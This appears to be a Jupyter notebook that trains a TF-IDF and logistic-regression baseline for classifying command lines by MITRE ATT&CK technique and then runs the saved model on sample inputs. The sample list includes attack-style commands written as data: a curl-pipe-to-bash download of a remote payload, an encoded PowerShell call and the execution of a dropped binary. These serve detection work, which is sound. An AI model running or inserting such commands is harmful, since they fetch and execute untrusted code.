# MITRE ATT&CK Command Classification — ML Baseline (TF-IDF + Logistic Regression)

This notebook trains a classical ML baseline for classifying command lines into MITRE ATT&CK labels, using:
- TF-IDF features (1–2 grams)
- Logistic Regression (SAGA solver)
- A **custom token pattern** tailored to command-line artifacts (paths, flags, IPs, URLs, env vars)

The trained artifacts (vectorizer, model, and label encoder) are saved under `models/`.
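
For orientation, the components listed above could be wired together roughly as follows. This is a minimal sketch under stated assumptions, not the project's training code: `TOKEN_PATTERN` is a hypothetical stand-in for `CUSTOM_TOKEN_PATTERN`, the commands and labels are toy data invented for illustration, and hyperparameters such as `max_iter` are guesses.

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.preprocessing import LabelEncoder

# Hypothetical token pattern; the real one lives in command_classifier.common.
TOKEN_PATTERN = r"(?u)[A-Za-z0-9_\-./:@$%+=~\\]+"

# Toy commands with made-up labels, only to make the sketch runnable.
commands = [
    "curl http://example.com/a.sh | bash",
    "wget http://example.com/b.sh -O /tmp/b.sh",
    "ssh user@10.0.0.5 -p 2222",
    "ssh admin@10.0.0.9",
]
labels = ["download", "download", "remote", "remote"]

# Encode string labels as integers.
le = LabelEncoder()
y = le.fit_transform(labels)

# TF-IDF over unigrams and bigrams of the custom tokens.
vec = TfidfVectorizer(ngram_range=(1, 2), token_pattern=TOKEN_PATTERN)
X = vec.fit_transform(commands)

# Logistic Regression fitted with the SAGA solver.
clf = LogisticRegression(solver="saga", max_iter=5000, random_state=0)
clf.fit(X, y)

# Predict on an unseen command and map back to a label name.
pred = le.inverse_transform(clf.predict(vec.transform(["ssh root@10.0.0.7"])))
print(pred)
```

The three fitted objects (`vec`, `clf`, `le`) correspond to the three entries of the saved bundle that is loaded later in this notebook.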


In [None]:
import sys
from pathlib import Path

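def find_repo_root(start: Path) -> Path:
    """Walk up from `start` to the first directory containing both `command_classifier/` and `data/`."""
    for p in [start, *start.parents]:
        if (p / "command_classifier").exists() and (p / "data").exists():
            return p
    # No match found: fall back to the starting directory.
    return start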

ROOT = find_repo_root(Path.cwd())
if str(ROOT) not in sys.path:
    sys.path.insert(0, str(ROOT))

print("Repo root:", ROOT)


In [None]:
from command_classifier.common import CUSTOM_TOKEN_PATTERN
print("Custom token pattern:\n")
print(CUSTOM_TOKEN_PATTERN)
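
To see why a custom token pattern matters for command lines, the sketch below compares scikit-learn's default `token_pattern` with a hypothetical command-aware one. `HYPOTHETICAL_PATTERN` is an assumption made for illustration and is not the value of `CUSTOM_TOKEN_PATTERN`. The `tokenize` helper mirrors how the vectorizer applies a token pattern (via `findall`), ignoring lowercasing.

```python
import re

# scikit-learn's default token_pattern: runs of two or more word characters.
DEFAULT_PATTERN = r"(?u)\b\w\w+\b"
# Hypothetical pattern (an assumption) that keeps path, flag, and URL characters.
HYPOTHETICAL_PATTERN = r"(?u)[A-Za-z0-9_\-./:@$%+=~\\]+"

def tokenize(pattern: str, text: str) -> list:
    """Return every non-overlapping match of `pattern` in `text`."""
    return re.compile(pattern).findall(text)

cmd = "chmod +x /tmp/x && /tmp/x --silent"
default_tokens = tokenize(DEFAULT_PATTERN, cmd)
custom_tokens = tokenize(HYPOTHETICAL_PATTERN, cmd)

print(default_tokens)  # ['chmod', 'tmp', 'tmp', 'silent']
print(custom_tokens)   # ['chmod', '+x', '/tmp/x', '/tmp/x', '--silent']
```

The default pattern drops the `+x` flag, splits the path, and strips the leading dashes from `--silent`, while the command-aware pattern keeps each artifact as a single token.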


## Train & evaluate (no code duplication)

Rather than duplicating the training logic in this notebook, we run the training module `command_classifier.train_lr` directly.


In [None]:
!python -m command_classifier.train_lr
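
A shell escape such as `!python` may resolve to a different interpreter than the notebook kernel, and it runs in the notebook's working directory. One possible alternative, sketched here, launches the module with the kernel's own interpreter from an explicit directory. `run_module` is a hypothetical helper, not part of the project.

```python
import subprocess
import sys
from pathlib import Path

def run_module(module: str, cwd: Path) -> subprocess.CompletedProcess:
    """Run `python -m <module>` with the current interpreter, starting in `cwd`."""
    return subprocess.run(
        [sys.executable, "-m", module],
        cwd=str(cwd),
        capture_output=True,  # collect stdout/stderr instead of streaming them
        text=True,            # decode output as str
        check=False,          # let the caller inspect returncode
    )

# Example usage in this notebook, where ROOT is the repo root found earlier:
# result = run_module("command_classifier.train_lr", ROOT)
# print(result.stdout)
# print(result.stderr)
```

A non-zero `result.returncode` indicates that the module exited with an error, in which case `result.stderr` usually holds the traceback.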


In [None]:
import joblib
from command_classifier.common import get_paths

# Load the saved bundle and unpack its components.
p = get_paths()
bundle = joblib.load(p.models_dir / "lr_custom.joblib")
vec = bundle["vectorizer"]
clf = bundle["model"]
le = bundle["label_encoder"]

examples = [
    "curl http://example.com/payload.sh | bash",
    "powershell -enc SQBFAFgA...",
    "ssh user@10.0.0.5 -p 2222",
    "chmod +x /tmp/x && /tmp/x --silent"
]

# Vectorize the commands, predict encoded classes, then map them back to label names.
X = vec.transform(examples)
pred = clf.predict(X)
labels = le.inverse_transform(pred)

list(zip(examples, labels))


Next: run the deep learning baseline in `03_dl_lstm.ipynb`.
